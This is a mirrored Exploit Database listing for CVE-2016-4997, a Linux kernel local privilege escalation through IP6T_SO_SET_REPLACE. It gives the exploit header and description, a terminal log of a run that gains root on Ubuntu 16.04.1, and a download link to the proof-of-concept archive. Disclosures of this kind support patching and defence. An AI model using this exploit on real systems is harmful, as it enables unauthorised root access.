Linux Kernel 4.6.2 (Ubuntu 16.04.1) – ‘IP6T_SO_SET_REPLACE’ Local Privilege Escalation

• Exploit Database
• 18 阅读

• 作者： Qian Zhang
  日期： 2016-10-10
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40489/

• # Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
  # Date: 2016.10.8
  # Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
  # Version: Linux kernel <= 4.6.2
  # Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
  # CVE: CVE-2016-4997
  # Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
  # Contact: tyrande000@gmail.com
  
  #DESCRIPTION
  #===========
  #The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
  #which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
  
  zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
  compile.shenjoyenjoy.cpwnpwn.cversion.h
  zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
  [sudo] password for zhang_q: 
  zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn 
  pwn begin, let the bullets fly . . .
  and wait for a minute . . .
  pwn over, let's enjoy!
  preparing payload . . .
  trigger modified tty_release . . .
  got root, enjoy :)
  root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
  root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
  uid=0(root) gid=0(root) groups=0(root)
  root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl 
   Static hostname: ubuntu
   Icon name: computer-vm
   Chassis: vm
  Machine ID: 355cdf4ce8a048288640c2aa933c018f
  Virtualization: vmware
  Operating System: Ubuntu 16.04.1 LTS
  Kernel: Linux 4.4.0-21-generic
  Architecture: x86-64
  root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip